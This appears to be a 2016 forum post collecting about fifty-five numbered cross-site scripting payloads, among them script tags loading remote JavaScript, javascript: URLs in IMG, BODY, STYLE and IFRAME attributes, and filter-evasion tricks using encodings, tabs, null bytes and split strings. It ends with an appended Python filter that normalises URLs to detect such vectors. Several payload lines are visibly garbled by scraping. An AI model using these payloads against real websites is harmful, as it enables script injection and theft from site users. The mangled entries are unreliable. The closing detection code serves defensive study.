XSS Attack Summary

Posted on 2016-4-28 10:06:15
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Fixing a malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters have basically no effect domestically, since there is nowhere to use them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the IMG tag
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the Title tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
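As an added example (not part of the original post), here is a Python check written from the filtering side: it normalises an attribute value the way a browser does before reading the URL scheme, so that the mixed-case, tab/newline/CR, NUL and HTML-encoded variants of items (4) to (19) above are all recognised as the same javascript: URL that a plain substring match misses. The sample values are constructed to mirror those items, and `example.invalid` is a placeholder host.

```python
import html
import re

# Schemes that execute script in src/href/url() positions: what the payloads above rely on.
SCRIPT_SCHEMES = {"javascript", "vbscript"}
# ASCII C0 controls plus space: browsers strip these from both ends of a URL before parsing.
_C0_AND_SPACE = "".join(map(chr, range(0x21)))

def naive_filter(value: str) -> bool:
    """The substring check that items (4), (11)-(14) and (17) are built to evade."""
    return "javascript:" in value

def normalize_url(value: str) -> str:
    """Mimic what a browser does before it sees the scheme: decode HTML character
    references, with or without ';' (items 5, 8, 9); strip leading/trailing C0
    controls and spaces (item 19); drop tab/LF/CR anywhere (items 11-14); drop
    NUL, as the old engines targeted by items 17/18 did."""
    value = html.unescape(value).strip(_C0_AND_SPACE)
    return re.sub(r"[\t\n\r\x00]", "", value)

def url_scheme(value: str) -> str:
    """Lower-cased scheme of the normalised value, or '' when there is none."""
    match = re.match(r"([A-Za-z][A-Za-z0-9+.-]*):", normalize_url(value))
    return match.group(1).lower() if match else ""

def is_script_url(value: str) -> bool:
    return url_scheme(value) in SCRIPT_SCHEMES

# Constructed attribute values mirroring the numbered items above (not copied from the post).
SAMPLES = {
    "(3) plain": "javascript:alert('XSS')",
    "(4) mixed case": "JaVaScRiPt:alert('XSS')",
    "(5) html encoded": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "(9) no semicolons": "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114"
                         "&#0000105&#0000112&#0000116&#0000058alert('XSS')",
    "(11) embedded tab": "jav\tascript:alert('XSS')",
    "(12) encoded tab": "jav&#x09;ascript:alert('XSS')",
    "(14) carriage return": "jav&#x0D;ascript:alert('XSS')",
    "(17) NUL byte": "java\x00script:alert('XSS')",
    "(19) leading controls": " &#14;  javascript:alert('XSS');",
    "(40) vbscript": "vbscript:msgbox('XSS')",
    "benign": "http://example.invalid/xss.js",
}

def audit(samples: dict = SAMPLES) -> dict:
    """Label -> (naive substring verdict, normalised-scheme verdict)."""
    return {k: (naive_filter(v), is_script_url(v)) for k, v in samples.items()}
```

Running `audit()` shows the naive filter catching only items (3) and (19) while the normalised check flags every sample except the benign URL, which is the reason an allow-list on the normalised scheme is the check to keep.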